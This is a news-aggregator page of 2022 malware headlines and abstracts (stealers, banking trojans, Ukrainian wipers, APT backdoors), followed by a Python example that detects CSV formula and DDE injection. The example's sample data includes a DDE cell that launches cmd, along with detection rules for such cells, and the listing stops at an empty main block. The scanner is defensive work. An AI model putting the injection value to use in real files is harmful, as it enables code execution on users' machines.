The credential-stealing Raccoon Stealer is spotted using the chat app to store and update C2 addresses as adversaries find creative new ways to distribute the malware. The cybercriminals are attempting to evade detection by packing the credential stealer using Themida or other malware packers. Expe ...Cyware Alerts - Hacker News
March 15, 2022
Lampion Trojan Returns with its Old Attack Infrastructure Full Text
Abstract
One of the most active banking trojans has been spotted tweaking its technique while using the same old infrastructure to target its victims in the banking sector. The attackers use fake banking templates impersonating Portuguese organizations to bait victims. Organizations are recommended to ma ...Cyware Alerts - Hacker News
March 15, 2022
CaddyWiper: Yet Another Data Wiping Malware Targeting Ukrainian Networks Full Text
Abstract
Two weeks after details emerged about a second data wiper strain delivered in attacks against Ukraine, yet another destructive malware has been detected amid Russia's continuing military invasion of the country. Slovak cybersecurity company ESET dubbed the third wiper " CaddyWiper ," which it said it first observed on March 14 around 9:38 a.m. UTC. Metadata associated with the executable (" caddy.exe ") shows that the malware was compiled at 7:19 a.m. UTC, a little over two hours prior to its deployment. CaddyWiper is notable for the fact that it doesn't share any similarities with previously discovered wipers in Ukraine, including HermeticWiper (aka FoxBlade or KillDisk) and IsaacWiper (aka Lasainraw), the two of which have been deployed in systems belonging to government and commercial entities. "The ultimate goal of the attackers is the same as with IsaacWiper and HermeticWiper: make the systems unusable by erasing user data and partition iThe Hacker News
March 15, 2022
Android trojan persists on the Google Play Store since January Full Text
Abstract
Security researchers tracking the mobile app ecosystem have noticed a recent spike in trojan infiltration on the Google Play Store, with one of the apps having over 500,000 installs.BleepingComputer
March 14, 2022
Brazilian trojan impacting Portuguese users and using the same capabilities seen in other Latin American threats Full Text
Abstract
A new variant of a Brazilian trojan has impacted Internet end users in Portugal since last month (February 2022). Although...Security Affairs
March 13, 2022
The hidden C2: Lampion trojan release 212 is on the rise and using a C2 server for two years Full Text
Abstract
Lampion trojan is one of the most active banking trojans impacting Portuguese Internet end users since 2019. This piece of malware is known for the usage...Security Affairs
March 12, 2022
Android malware Escobar steals your Google Authenticator MFA codes Full Text
Abstract
The Aberebot banking trojan appears to have returned, as its author is actively promoting a new version of the tool on dark web markets and forums.BleepingComputer
March 10, 2022
Corporate website contact forms used to spread BazarBackdoor malware Full Text
Abstract
The stealthy BazarBackdoor malware is now being spread via website contact forms rather than typical phishing emails to evade detection by security software.BleepingComputer
March 10, 2022
Qakbot injects itself into the middle of your conversations Full Text
Abstract
The messages generally contain brief text content, followed by a link to download a zip archive. These links may be “bare URLs” like above, or hot-linked text in the message body.Sophos
March 10, 2022
Malware disguised as security tool targets Ukraine’s IT Army Full Text
Abstract
A new malware distribution campaign has surfaced, taking advantage of the willingness of a large number of people to support Ukraine in the ongoing cyber warfare to infect them with info-stealers.BleepingComputer
March 10, 2022
Raccoon Stealer: “Trash panda” abuses Telegram Full Text
Abstract
Avast researchers came across a stealer, called Raccoon Stealer, a name given to it by its author. Raccoon Stealer uses the Telegram infrastructure to store and update actual C&C addresses.Avast
March 7, 2022
SharkBot, the new generation banking Trojan distributed via Play Store Full Text
Abstract
SharkBot banking malware was able to evade Google Play Store security checks by masquerading as an antivirus app. SharkBot is a banking trojan that has been active since October 2021; it allows attackers to steal banking account credentials and bypass multi-factor...Security Affairs
March 7, 2022
Beware of malware offering “Warm greetings from Saudi Aramco” Full Text
Abstract
Malwarebytes found a Formbook campaign targeting oil and gas companies. The campaign was delivered through targeted emails containing two attachments, a PDF file and an Excel document.Malwarebytes Labs
March 06, 2022
SharkBot Banking Malware Spreading via Fake Android Antivirus App on Google Play Store Full Text
Abstract
The threat actor behind a nascent Android banking trojan named SharkBot has managed to evade Google Play Store security barriers by masquerading as an antivirus app. SharkBot, like its malware counterparts TeaBot, FluBot, and Oscorp (UBEL), belongs to a category of financial trojans capable of siphoning credentials to initiate money transfers from compromised devices by circumventing multi-factor authentication mechanisms. It first emerged on the scene in November 2021. Where SharkBot stands apart is in its ability to carry out the unauthorized transactions via Automatic Transfer Systems (ATS), which stands in contrast to TeaBot, which requires a live operator to interact with the infected devices to conduct the malicious activities. "The ATS features allow the malware to receive a list of events to be simulated, and they will be simulated in order to do the money transfers," Alberto Segura and Rolf Govers, malware analysts at cybersecurity firm NCC Group, saidThe Hacker News
March 05, 2022
Malware now using NVIDIA’s stolen code signing certificates Full Text
Abstract
Threat actors are using stolen NVIDIA code signing certificates to sign malware to appear trustworthy and allow malicious drivers to be loaded in Windows.BleepingComputer
March 05, 2022
SharkBot malware hides as Android antivirus in Google Play Full Text
Abstract
The banking trojan tracked as SharkBot has infiltrated the Google Play Store, Android's official and most trusted app store, posing as an antivirus and system cleaner application.BleepingComputer
March 5, 2022
Conti’s Source Code Now Publicly Available Full Text
Abstract
The Russia-Ukraine cyberwar continues to evolve, with a researcher leaking a big chunk of internal messages and source code associated with the Conti ransomware group. The leak includes how the threat actors are organized like a business, how they avoid law enforcement, and much more. Meanwhile, so ...Cyware Alerts - Hacker News
March 4, 2022
Highly Sophisticated FoxBlade Malware Targets Ukrainian Networks Full Text
Abstract
Microsoft laid bare a cyberattack effort involving the FoxBlade malware, which was launched against Ukraine hours before Russia’s tanks and missiles began to hit the country. Upon understanding the threat it poses, the firm provided technical advice on how to identify and mitigate the enclosed ...Cyware Alerts - Hacker News
March 4, 2022
The New Daxin Network Attack Tool has a Chinese Link Full Text
Abstract
The CISA and Symantec laid bare Daxin, a stealthy backdoor linked to a Chinese hacker group. The highly sophisticated rootkit was used against select governments and other critical infrastructure targets. Organizations are suggested to make use of IOCs that may help in the detection of malicious ac ...Cyware Alerts - Hacker News
March 04, 2022
Russia-Ukraine war exploited as lure for malware distribution Full Text
Abstract
Threat actors are distributing malware using phishing themes related to the invasion of Ukraine, aiming to infect their targets with remote access trojans (RATs) such as Agent Tesla and Remcos.BleepingComputer
March 2, 2022
TeaBot Trojan Haunts Google Play Store, Again Full Text
Abstract
Malicious Google Play apps have circumvented censorship by hiding trojans in software updates.Threatpost
March 01, 2022
TeaBot Android Banking Malware Spreads Again Through Google Play Store Apps Full Text
Abstract
An Android banking trojan designed to steal credentials and SMS messages has been observed once again sneaking past Google Play Store protections to target users of more than 400 banking and financial apps, including those from Russia, China, and the U.S. "TeaBot RAT capabilities are achieved via the device screen's live streaming (requested on-demand) plus the abuse of Accessibility Services for remote interaction and key-logging," Cleafy researchers said in a report. "This enables Threat Actors (TAs) to perform ATO (Account Takeover) directly from the compromised phone, also known as 'On-device fraud.'" Also known by the name Anatsa, TeaBot first emerged in May 2021, camouflaging its malicious functions by posing as seemingly innocuous PDF document and QR code scanner apps that are distributed via the official Google Play Store instead of third-party apps stores or via fraudulent websites. These apps, also known as dropper applications, act aThe Hacker News
March 1, 2022
IsaacWiper, the third wiper spotted since the beginning of the Russian invasion Full Text
Abstract
IsaacWiper, a new data wiper was used against an unnamed Ukrainian government network after Russia's invasion of Ukraine. ESET researchers uncovered a new data wiper, tracked as IsaacWiper, that was used against an unnamed Ukrainian government network...Security Affairs
March 1, 2022
Daxin Espionage Backdoor Ups the Ante on Chinese Malware Full Text
Abstract
Via node-hopping, the espionage tool can reach computers that aren’t even connected to the internet.Threatpost
March 01, 2022
TeaBot malware slips back into Google Play Store to target US users Full Text
Abstract
The TeaBot banking trojan was spotted once again in Google Play Store where it posed as a QR code app and spread to more than 10,000 devices.BleepingComputer
February 28, 2022
Chinese cyberspies target govts with their ‘most advanced’ backdoor Full Text
Abstract
Security researchers have discovered Daxin, a China-linked stealthy backdoor specifically designed for deployment in hardened corporate networks that feature advanced threat detection capabilities.BleepingComputer
February 28, 2022
Malicious Package Imitates Python Server Library to Spy on Users and Maintain Remote System Control Full Text
Abstract
The legitimate AIOHTTP library is a popular asynchronous HTTP Client/Server for the asyncio library and Python-based applications. The component receives over 9 million weekly downloads on average.Sonatype
February 27, 2022
Iranian Hackers Using New Spying Malware That Abuses Telegram Messenger API Full Text
Abstract
An Iranian geopolitical nexus threat actor has been uncovered deploying two new targeted malware that come with "simple" backdoor functionalities as part of an intrusion against an unnamed Middle East government entity in November 2021. Cybersecurity company Mandiant attributed the attack to an uncategorized cluster it's tracking under the moniker UNC3313, which it assesses with "moderate confidence" as associated with the MuddyWater state-sponsored group. "UNC3313 conducts surveillance and collects strategic information to support Iranian interests and decision-making," researchers Ryan Tomcik, Emiel Haeghebaert, and Tufail Ahmed said. "Targeting patterns and related lures demonstrate a strong focus on targets with a geopolitical nexus." In mid-January 2022, U.S. intelligence agencies characterized MuddyWater (aka Static Kitten, Seedworm, TEMP.Zagros, or Mercury) as a subordinate element of the Iranian Ministry of Intelligence andThe Hacker News
February 26, 2022
Social Media Hijacking Malware Spreading Through Gaming Apps on Microsoft Store Full Text
Abstract
A new malware capable of controlling social media accounts is being distributed through Microsoft's official app store in the form of trojanized gaming apps, infecting more than 5,000 Windows machines in Sweden, Bulgaria, Russia, Bermuda, and Spain. Israeli cybersecurity company Check Point dubbed the malware "Electron Bot," in reference to a command-and-control (C2) domain used in recent campaigns. The identity of the attackers is not known, but evidence suggests that they could be based out of Bulgaria. "Electron Bot is a modular SEO poisoning malware, which is used for social media promotion and click fraud," Check Point's Moshe Marelus said in a report published this week. "It is mainly distributed via the Microsoft store platform and dropped from dozens of infected applications, mostly games, which are constantly uploaded by the attackers." The first sign of malicious activity commenced as an ad clicker campaign that was discovered in OThe Hacker News
February 26, 2022
Fileless SockDetour backdoor targets U.S.-based defense contractors Full Text
Abstract
Researchers provided details about a stealthy custom malware dubbed SockDetour that targeted U.S.-based defense contractors. Cybersecurity researchers from Palo Alto Networks' Unit 42 have analyzed a previously undocumented and custom backdoor tracked...Security Affairs
February 25, 2022
New “SockDetour” Fileless, Socketless Backdoor Targets U.S. Defense Contractors Full Text
Abstract
Cybersecurity researchers have taken the wraps off a previously undocumented and stealthy custom malware called SockDetour that targeted U.S.-based defense contractors with the goal of being used as a secondary implant on compromised Windows hosts. "SockDetour is a backdoor that is designed to remain stealthily on compromised Windows servers so that it can serve as a backup backdoor in case the primary one fails," Palo Alto Networks' Unit 42 threat intelligence said in a report published Thursday. "It is difficult to detect, since it operates filelessly and socketlessly on compromised Windows servers." Even more concerningly, SockDetour is believed to have been used in attacks since at least July 2019, based on a compilation timestamp on the sample, implying that the backdoor successfully managed to slip past detection for over two-and-a-half years. The attacks have been attributed to a threat cluster it tracks as TiltedTemple (aka DEV-0322 by MicrosofThe Hacker News
February 25, 2022
US and UK details a new Python backdoor used by MuddyWater APT group Full Text
Abstract
US and UK cybersecurity agencies provided details of a new malware used by Iran-linked MuddyWater APT. CISA, the FBI, the US Cyber Command's Cyber National Mission Force (CNMF), UK's National Cyber Security Centre (NCSC-UK), and the NSA, and law enforcement...Security Affairs
February 25, 2022
Jester Stealer malware adds more capabilities to entice hackers Full Text
Abstract
An infostealing piece of malware called Jester Stealer has been gaining popularity in the underground cybercrime community for its functionality and affordable prices.BleepingComputer
February 24, 2022
Microsoft App Store Sizzling with New ‘Electron Bot’ Malware Full Text
Abstract
The SEO poisoning bot, capable of full system takeover, is actively taking over social media accounts, masquerading as popular games like Temple Run.Threatpost
February 24, 2022
US and UK expose new malware used by MuddyWater hackers Full Text
Abstract
US and UK cybersecurity and law enforcement agencies today shared info on new malware deployed by the Iranian-backed MuddyWater hacking group in attacks targeting critical infrastructure worldwide.BleepingComputer
February 24, 2022
New Wiper Malware HermeticWiper targets Ukrainian systems Full Text
Abstract
Cybersecurity experts discovered a new data wiper malware that was used in attacks against hundreds of machines in Ukraine. The threat of hybrid warfare is reality; Russia-linked APT groups have supported the operations of the Russian army while...Security Affairs
February 24, 2022
Malware infiltrates Microsoft Store via clones of popular games Full Text
Abstract
A malware named Electron Bot has found its way into Microsoft's Official Store through clones of popular games such as Subway Surfer and Temple Run, leading to the infection of 5,000 computers in Sweden, Israel, Spain, and Bermuda.BleepingComputer
February 23, 2022
New Wiper Malware Targeting Ukraine Amid Russia’s Military Operation Full Text
Abstract
Cybersecurity firms ESET and Broadcom's Symantec said they discovered a new data wiper malware used in fresh attacks against hundreds of machines in Ukraine, as Russian forces formally launched a full-scale military operation against the country. The Slovak company dubbed the wiper "HermeticWiper" (aka KillDisk.NCV), with one of the malware samples compiled on December 28, 2021, implying that preparations for the attacks may have been underway for nearly two months. "The wiper binary is signed using a code signing certificate issued to Hermetica Digital Ltd," ESET said in a series of tweets. "The wiper abuses legitimate drivers from the EaseUS Partition Master software in order to corrupt data. As a final step the wiper reboots [the] computer." Specifically, HermeticWiper is delivered via the benign but signed EaseUS partition management driver that then proceeds to impair the first 512 bytes, the Master Boot Record (MBR) for every physThe Hacker News
February 23, 2022
Dridex Malware Deploying Entropy Ransomware on Hacked Computers Full Text
Abstract
Similarities have been unearthed between the Dridex general-purpose malware and a little-known ransomware strain called Entropy, suggesting that the operators are continuing to rebrand their extortion operations under a different name. "The similarities are in the software packer used to conceal the ransomware code, in the malware subroutines designed to find and obfuscate commands (API calls), and in the subroutines used to decrypt encrypted text," cybersecurity firm Sophos said in a report shared with The Hacker News. The commonalities were uncovered following two unrelated incidents targeting an unnamed media company and a regional government agency. In both cases, the deployment of Entropy was preceded by infecting the target networks with Cobalt Strike Beacons and Dridex, granting the attackers remote access. Despite consistency in some aspects of the twin attacks, they also varied significantly with regards to the initial access vector used to worm their way insThe Hacker News
February 23, 2022
New Variant of CryptBot Targets All Chrome Versions Full Text
Abstract
Security experts spotted a new version of the CryptBot infostealer that is offering free download versions of cracked games and pro-grade software. Its operators are using search engine optimization to rank up the distribution sites to display them at top of Google search results, allowing increase ...Cyware Alerts - Hacker News
February 23, 2022
Chinese Experts Uncover Details of Equation Group’s Bvp47 Covert Hacking Tool Full Text
Abstract
Researchers from China's Pangu Lab have disclosed details of a "top-tier" backdoor put to use by the Equation Group, an advanced persistent threat (APT) with alleged ties to the cyber-warfare intelligence-gathering unit of the U.S. National Security Agency (NSA). Dubbed "Bvp47" owing to numerous references to the string "Bvp" and the numerical value "0x47" used in the encryption algorithm, the backdoor was extracted from Linux systems "during an in-depth forensic investigation of a host in a key domestic department" in 2013. Pangu Lab codenamed the attacks involving the deployment of Bvp47 "Operation Telescreen," with the implant featuring an "advanced covert channel behavior based on TCP SYN packets, code obfuscation, system hiding, and self-destruction design." The Shadow Brokers leaks Equation Group, designated as the "crown creator of cyber espionage" by Russian security firm Kaspersky, iThe Hacker News
February 23, 2022
Xenomorph Trojan Spreading via Play Store Full Text
Abstract
A new banking trojan called Xenomorph was found distributing via Google Play Store in the form of fake performance-boosting apps, targeting European banks. It comes with a modular engine that abuses accessibility services, which may allow advanced capabilities. Experts recommend using an anti-malwa ...Cyware Alerts - Hacker News
February 22, 2022
25 Malicious JavaScript Libraries Distributed via Official NPM Package Repository Full Text
Abstract
Another batch of 25 malicious JavaScript libraries has made its way to the official NPM package registry with the goal of stealing Discord tokens and environment variables from compromised systems, more than two months after 17 similar packages were taken down. The libraries in question leveraged typosquatting techniques and masqueraded as other legitimate packages such as colors.js, crypto-js, discord.js, marked, and noblox.js, DevOps security firm JFrog said, attributing the packages as the work of "novice malware authors." The complete list of packages is below – node-colors-sync (Discord token stealer), color-self (Discord token stealer), color-self-2 (Discord token stealer), wafer-text (Environment variable stealer), wafer-countdown (Environment variable stealer), wafer-template (Environment variable stealer), wafer-darla (Environment variable stealer), lemaaa (Discord token stealer), adv-discord-utility (Discord token stealer), tools-for-discord (Discord tThe Hacker News
February 21, 2022
New Android Banking Trojan Spreading via Google Play Store Targets Europeans Full Text
Abstract
A new Android banking trojan with over 50,000 installations has been observed distributed via the official Google Play Store with the goal of targeting 56 European banks and harvesting sensitive information from compromised devices. Dubbed Xenomorph by Dutch security firm ThreatFabric, the in-development malware is said to share overlaps with another banking trojan tracked under the moniker Alien while also being "radically different" from its predecessor in terms of the functionalities offered. "Despite being a work-in-progress, Xenomorph is already sporting effective overlays and being actively distributed on official app stores," ThreatFabric's founder and CEO, Han Sahin, said. "In addition, it features a very detailed and modular engine to abuse accessibility services, which in the future could power very advanced capabilities, like ATS." Alien, a remote access trojan (RAT) with notification sniffing and authenticator-based 2FAThe Hacker News
February 21, 2022
Xenomorph Android banking trojan distributed via Google Play Store Full Text
Abstract
Xenomorph Android trojan has been observed distributed via the official Google Play Store targeting 56 European banks. Researchers from ThreatFabric have spotted a new Android banking trojan, dubbed Xenomorph, distributed via the official Google...Security Affairs
February 21, 2022
Revamped CryptBot malware spread by pirated software sites Full Text
Abstract
A new version of the CryptBot info stealer was seen in distribution via multiple websites that offer free downloads of cracks for games and pro-grade software.BleepingComputer
February 18, 2022
The Week in Ransomware - February 18th 2022 - Mergers & Acquisitions Full Text
Abstract
The big news this week is that the Conti ransomware gang has recruited the core developers and managers of the TrickBot group, the developers of the notorious TrickBot malware.BleepingComputer
February 18, 2022
PseudoManuscrypt Malware Spreading the Same Way as CryptBot Targets Koreans Full Text
Abstract
Numerous Windows machines located in South Korea have been targeted by a botnet tracked as PseudoManuscrypt since at least May 2021 by employing the same delivery tactics of another malware called CryptBot. "PseudoManuscrypt is disguised as an installer that is similar to a form of CryptBot, and is being distributed," South Korean cybersecurity company AhnLab Security Emergency Response Center (ASEC) said in a report published today. "Not only is its file form similar to CryptBot, but it is also distributed via malicious sites exposed on the top search page when users search commercial software-related illegal programs such as Crack and Keygen," it added. According to ASEC, around 30 computers in the country are being consistently infected on a daily basis on average. PseudoManuscrypt was first documented by Russian cybersecurity firm Kaspersky in December 2021, when it disclosed details of a "mass-scale spyware attack campaign" infecting morThe Hacker News
February 16, 2022
Trickbot Malware Targeted Customers of 60 High-Profile Companies Since 2020 Full Text
Abstract
The notorious TrickBot malware is targeting customers of 60 financial and technology companies, including cryptocurrency firms, primarily located in the U.S., even as its operators have updated the botnet with new anti-analysis features. "TrickBot is a sophisticated and versatile malware with more than 20 modules that can be downloaded and executed on demand," Check Point researchers Aliaksandr Trafimchuk and Raman Ladutska said in a report published today. In addition to being both prevalent and persistent, TrickBot has continually evolved its tactics to go past security and detection layers. To that end, the malware's "injectDll" web-injects module, which is responsible for stealing banking and credential data, leverages anti-deobfuscation techniques to crash the web page and thwart attempts to scrutinize the source code. Also put in place are anti-analysis guardrails to prevent security researchers from sending automated requests to command-and-conThe Hacker News
February 16, 2022
Emotet Malware Spreads by Hijacking Email Threats and Luring Users with Malicious Attachments Full Text
Abstract
As early as December 21, 2021, researchers from Palo Alto Networks' Unit 42 observed a new infection method for the highly prevalent malware family Emotet involving thread hijacking.Palo Alto Networks
February 15, 2022
New MyloBot Malware Variant Sends Sextortion Emails Demanding $2,732 in Bitcoin Full Text
Abstract
A new version of the MyloBot malware has been observed to deploy malicious payloads that are being used to send sextortion emails demanding victims to pay $2,732 in digital currency. MyloBot, first detected in 2018, is known to feature an array of sophisticated anti-debugging capabilities and propagation techniques to rope infected machines into a botnet, not to mention remove traces of other competing malware from the systems. Chief among its methods to evade detection and stay under the radar included a delay of 14 days before accessing its command-and-control servers and the facility to execute malicious binaries directly from memory. MyloBot also leverages a technique called process hollowing, wherein the attack code is injected into a suspended and hollowed process in order to circumvent process-based defenses. This is achieved by unmapping the memory allocated to the live process and replacing it with the arbitrary code to be executed, in this case a decoded resource fiThe Hacker News
February 14, 2022
‘Cities: Skylines’ Gaming Modder Banned Over Hidden Malware Full Text
Abstract
35K+ players were exposed to an auto-updater that planted a trojan that choked performance for fellow modders and Colossal Order employees.Threatpost
February 10, 2022
Qbot, Lokibot malware switch back to Windows Regsvr32 delivery Full Text
Abstract
Malware distributors have turned to an older trick known as Squiblydoo to spread Qbot and Lokibot via Microsoft Office documents using regsvr32.exe.BleepingComputer
February 9, 2022
StellarParticle Campaign - New Undetected Malware Revealed After Two Years Full Text
Abstract
Hackers associated with the SolarWinds attacks have been using two new threats, the GoldMax backdoor and the TrailBlazer malware family, in StellarParticle campaigns for over two years. Researchers have provided detailed information regarding the latest TTPs observed in cyberattacks and sugge ...Cyware Alerts - Hacker News
February 09, 2022
Fake Windows 11 upgrade installers infect you with RedLine malware Full Text
Abstract
Threat actors have started distributing fake Windows 11 upgrade installers to users of Windows 10, tricking them into downloading and executing RedLine stealer malware.BleepingComputer
February 8, 2022
BazarBackdoor Spreads via Malicious CSV Files Full Text
Abstract
Cybercriminals have found a way to abuse text-based CSV files in a phishing campaign that pretends to be Payment Remittance Advice to install BazarBackdoor malware on users' systems. In the past two days, researchers have spotted 102 actual non-sandbox corporations, along with government victims. O ...Cyware Alerts - Hacker News
February 08, 2022
Several Malware Families Using Pay-Per-Install Service to Expand Their Targets Full Text
Abstract
A detailed examination of a Pay-per-install (PPI) malware service called PrivateLoader has revealed its crucial role in the delivery of a variety of malware such as SmokeLoader, RedLine Stealer, Vidar, Raccoon, and GCleaner since at least May 2021. Loaders are malicious programs used for loading additional executables onto the infected machine. With PPI malware services such as PrivateLoader, malware operators pay the service owners to get their payloads "installed" based on the targets provided. "The accessibility and moderate costs allow malware operators to leverage these services as another weapon for rapid, bulk and geo-targeted malware infections," cybersecurity firm Intel 471 said in a new report shared with The Hacker News. PrivateLoader, written in the C++ programming language, is designed to retrieve URLs for the malicious payloads to be deployed on the infected host, with the distribution primarily relying on a network of bait websitesThe Hacker News
February 08, 2022
‘Roaming Mantis’ Android Malware Targeting Europeans via Smishing Campaigns Full Text
Abstract
A financially motivated campaign that targets Android devices and spreads mobile malware via SMS phishing techniques since at least 2018 has spread its tentacles to strike victims located in France and Germany for the first time. Dubbed Roaming Mantis, the latest spate of activities observed in 2021 involve sending fake shipping-related texts containing a URL to a landing page from where Android users are infected with a banking trojan known as Wroba whereas iPhone users are redirected to a phishing page that masquerades as the official Apple website. The top affected countries, based on telemetry data gathered by Kaspersky between July 2021 and January 2022, are France, Japan, India, China, Germany, and Korea. Also tracked under the names MoqHao and XLoader (not to be confused with the info-stealer malware of the same name targeting Windows and macOS), the group's activity has continued to expand geographically even as the operators broadened their attack methods to mThe Hacker News
February 08, 2022
Medusa Android Banking Trojan Spreading Through Flubot’s Attacks Network Full Text
Abstract
Two different Android banking Trojans, FluBot and Medusa, are relying on the same delivery vehicle as part of a simultaneous attack campaign, according to new research published by ThreatFabric. The ongoing side-by-side infections, facilitated through the same smishing (SMS phishing) infrastructure, involved the overlapping usage of "app names, package names, and similar icons," the Dutch mobile security firm said. Medusa, first discovered targeting Turkish financial organizations in July 2020, has undergone several iterations, chief among which is the ability to abuse accessibility permissions in Android to siphon funds from banking apps to an account controlled by the attacker. "Medusa sports other dangerous features like keylogging, accessibility event logging, and audio and video streaming — all these capabilities provide actors with almost full access to [a] victim's device," the researchers said. The malware-ridden apps used in conjunction with FluThe Hacker News
February 8, 2022
The Growing Menace of Malicious npm Packages Full Text
Abstract
Researchers found 1,300 malicious npm packages that could help hackers trigger supply chain attacks and steal credentials and cryptocurrency, as well as run botnets. The report states that 57% of attacks happened during three days of the week - Friday, Saturday, and Sunday. It is recommended to ...Cyware Alerts - Hacker News
February 8, 2022
PrivateLoader Used to Deploy Smokeloader, Redline, and Vidar Malware Full Text
Abstract
An examination of a pay-per-install loader called PrivateLoader has highlighted its place in the deployment of popular malware strains including Smokeloader, Redline, and Vidar.ZDNet
February 08, 2022
Qbot needs only 30 minutes to steal your credentials, emails Full Text
Abstract
The widespread malware known as Qbot (aka Qakbot or QuakBot) has recently returned to light-speed attacks, and according to analysts, it only takes around 30 minutes to steal sensitive data after the initial infection.BleepingComputer
February 7, 2022
Roaming Mantis Expands Android Backdoor to Europe Full Text
Abstract
The ‘smishing’ group lives up to its name, expanding globally and adding image exfiltration to the Wroba RAT it uses to infect mobile victims.Threatpost
February 07, 2022
New CapraRAT Android Malware Targets Indian Government and Military Personnel Full Text
Abstract
A politically motivated advanced persistent threat (APT) group has expanded its malware arsenal to include a new remote access trojan (RAT) in its espionage attacks aimed at Indian military and diplomatic entities. Called CapraRAT by Trend Micro, the implant is an Android RAT that exhibits a high "degree of crossover" with another Windows malware known as CrimsonRAT that's associated with Earth Karkaddan, a threat actor that's also tracked under the monikers APT36, Operation C-Major, PROJECTM, Mythic Leopard, and Transparent Tribe. The first concrete signs of APT36's existence appeared in 2016 as the group began distributing information-stealing malware through phishing emails with malicious PDF attachments targeting Indian military and government personnel. The group is believed to be of Pakistani origin and operational since at least 2013. The threat actor is also known to be consistent in its modus operandi, with the attacks predominantly banking oThe Hacker News
February 07, 2022
Microsoft plans to kill malware delivery via Office macros Full Text
Abstract
Microsoft announced today that it will make it difficult to enable VBA macros downloaded from the Internet in several Microsoft Office apps starting in early April, effectively killing a popular distribution method for malware.BleepingComputer
February 3, 2022
MacOS Malware UpdateAgent Grows Increasingly Malicious Full Text
Abstract
The macOS malware, dubbed UpdateAgent, was found propagating for almost 14 months. It started circulating around November or December 2020 as a basic infostealer.Cyware Alerts - Hacker News
February 03, 2022
New Variant of UpdateAgent Malware Infects Mac Computers with Adware Full Text
Abstract
Microsoft on Wednesday shed light on a previously undocumented Mac trojan that it said has undergone several iterations since its first appearance in September 2020, effectively granting it an "increasing progression of sophisticated capabilities." The company's Microsoft 365 Defender Threat Intelligence Team dubbed the new malware family "UpdateAgent," charting its evolution from a barebones information stealer to a second-stage payload distributor as part of multiple attack waves observed in 2021. "The latest campaign saw the malware installing the evasive and persistent Adload adware, but UpdateAgent's ability to gain access to a device can theoretically be further leveraged to fetch other, potentially more dangerous payloads," the researchers said. The actively in-development malware is said to be propagated via drive-by downloads or advertisement pop-ups that masquerade as legitimate software like video applications and support agentsThe Hacker News
February 03, 2022
State hackers’ new malware helped them stay undetected for 250 days Full Text
Abstract
A state-backed Chinese APT actor tracked as 'Antlion' has been using a new custom backdoor called 'xPack' against financial organizations and manufacturing companies.BleepingComputer
February 2, 2022
Thousands of Malicious npm Packages Threaten Web Apps Full Text
Abstract
Attackers increasingly are using malicious JavaScript packages to steal data, engage in cryptojacking and unleash botnets, offering a wide supply-chain attack surface for threat actors.Threatpost
February 2, 2022
Charming Kitten Sharpens Its Claws with PowerShell Backdoor Full Text
Abstract
The notorious Iranian APT is fortifying its arsenal with new malicious tools and evasion tactics and may even be behind the Memento ransomware.Threatpost
February 2, 2022
Lazarus Pushes Malware by Placing Job Offers Full Text
Abstract
Lazarus APT group, infamous for targeting the defense industry, now abuses Windows Update Client to spread malware. It was recently observed masquerading as Lockheed Martin in spear-phishing campaigns. For the first time in this campaign, the group used GitHub as a C2 for targeted and short-ter ... Cyware Alerts - Hacker News
February 2, 2022
CoinStomp Malware Targets Asian Cloud Service Providers to Mine Monero Full Text
Abstract
Researchers say that the purpose of CoinStomp is to quietly compromise instances in order to harness computing power to illicitly mine cryptocurrency, a form of attack known as cryptojacking.ZDNet
February 02, 2022
SEO poisoning pushes malware-laced Zoom, TeamViewer, Visual Studio installers Full Text
Abstract
A new SEO poisoning campaign is underway, dropping the Batloader and Atera Agent malware onto the systems of targeted professionals searching for productivity tool downloads, such as Zoom, TeamViewer, and Visual Studio.BleepingComputer
February 02, 2022
New Malware Used by SolarWinds Attackers Went Undetected for Years Full Text
Abstract
The threat actor behind the supply chain compromise of SolarWinds has continued to expand its malware arsenal with new tools and techniques that were deployed in attacks as early as 2019, once again indicative of the elusive nature of the campaigns and the adversary's ability to maintain persistent access for years. According to cybersecurity firm CrowdStrike, which detailed the novel tactics adopted by the Nobelium hacking group last week, two sophisticated malware families were placed on victim systems — a Linux variant of GoldMax and a new implant dubbed TrailBlazer — long before the scale of the attacks came to light. Nobelium, the Microsoft-assigned moniker for the SolarWinds intrusion in December 2020, is also tracked by the wider cybersecurity community under the names UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (CrowdStrike), Dark Halo (Volexity), and Iron Ritual (Secureworks). The malicious activities have since been attributed to a Russian state-sponsoreThe Hacker News
February 01, 2022
Malicious CSV text files used to install BazarBackdoor malware Full Text
Abstract
A new phishing campaign is using specially crafted CSV text files to infect users' devices with the BazarBackdoor malware.BleepingComputer
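The abstract does not say how the CSV files were crafted, but the usual way a plain-text CSV becomes an execution vector is a cell that a spreadsheet application evaluates instead of displaying: a leading =, +, - or @ turns the cell into a formula, and the =app|topic!item form is the DDE syntax that can launch a program after the user clicks through the prompts. The scanner below is an added example written for this page, not code from BleepingComputer or from the campaign; the sample CSV is constructed, and the harmless "echo" command in the DDE cell stands in for whatever a real lure would run.

```python
import csv
import io
from typing import List, Tuple

# Constructed sample CSV for this example (not the BazarBackdoor lure): a plain row,
# a cell Excel would evaluate as a formula, a DDE-style cell that would launch a
# program if the user accepts the prompts, and a negative number that must NOT be flagged.
SAMPLE_CSV = (
    "name,amount,note\n"
    "alice,12.50,ok\n"
    "bob,=SUM(A1:A2),formula\n"
    "carol,\"=cmd|' /c echo hi'!A0\",dde\n"
    "dave,-3,negative number\n"
)

# Characters that make Excel/LibreOffice treat a cell as a formula rather than text.
FORMULA_PREFIXES = ("=", "+", "-", "@")


def cell_risk(cell: str) -> str:
    """Classify one cell: 'none', 'formula' (evaluated expression) or 'dde' (app|topic!item launch syntax)."""
    s = cell.lstrip()  # conservative: flag the cell even if leading whitespace precedes the prefix
    if not s or not s.startswith(FORMULA_PREFIXES):
        return "none"
    try:
        float(s)  # "-3" or "+1.5" are ordinary numbers, not formulas
        return "none"
    except ValueError:
        pass
    # Classic DDE launch syntax is =app|topic!item, so pipe and bang together are the tell.
    if "|" in s and "!" in s:
        return "dde"
    return "formula"


def scan_csv(text: str) -> List[Tuple[int, int, str, str]]:
    """Return (row, column, risk, cell) for every cell a spreadsheet would not store as plain text."""
    findings = []
    for row_no, row in enumerate(csv.reader(io.StringIO(text)), start=1):
        for col_no, cell in enumerate(row, start=1):
            risk = cell_risk(cell)
            if risk != "none":
                findings.append((row_no, col_no, risk, cell))
    return findings


def neutralize_cell(cell: str) -> str:
    """Prefix a risky cell with an apostrophe so spreadsheet applications keep it as literal text."""
    return "'" + cell if cell_risk(cell) != "none" else cell


if __name__ == "__main__":
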